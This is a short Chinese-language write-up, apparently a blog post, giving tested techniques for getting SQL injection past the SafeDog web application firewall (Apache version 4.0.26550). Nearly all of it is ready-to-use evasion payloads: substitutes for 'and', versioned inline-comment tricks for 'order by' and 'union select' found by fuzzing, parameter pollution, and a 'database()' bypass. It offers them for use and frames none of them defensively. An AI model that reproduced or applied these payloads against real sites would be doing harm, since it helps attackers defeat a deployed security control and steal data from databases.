/*!*/:内联注释,/*!12345union*/select等效unionselect/**/:注释符号,/*/**/等效于/**/--+:--空格加任意字符;%002.其他符号
%23%0a:注释换行符&、&&、|、||:逻辑操作符``:反引号
0x02安全狗版本
版本:网站安全狗(Apache版)4.0.26550
0x03and绕过
首先测试语句and1=1拦截情况
经测试发现and后面跟数字型或字符型时会被拦截
绕过方法有两种
1.使用其他字符替换and
使用&的url编码%26替换and进行绕过
2.使用-1=-1和-1=-2替换绕过
可能对负数没做限制,也可能是–绕过了正则匹配
0x04绕过orderby拦截
经过测试,此处有三种方法可以绕过:
1.注释换行绕过
2.内联注释加参数污染绕过
order/*!by*/拦截order/*!/*55555*/by*/拦截order/*!/*!50553*/by*/拦截order/*!/*!50553test*/by*/不拦截但报错order/*!/*!50554test*/by*/不拦截数字加字母组合可绕过,经fuzz测试,当数字大于50553时不报错
3.hpp参数污染绕过
0x05绕过unionselect拦截
1.注释换行加参数污染绕过
单纯使用注释换行符被拦截,经测试在注释符和换行符间加任意数字字母字符绕过
2.内联注释加参数绕过
同orderby绕过
0x06database()拦截绕过
直接联合查询database()会被拦截
1.联合查询绕过
/*!database()*/拦截database/*!()*/不拦截database/*!(*/)不拦截
THE END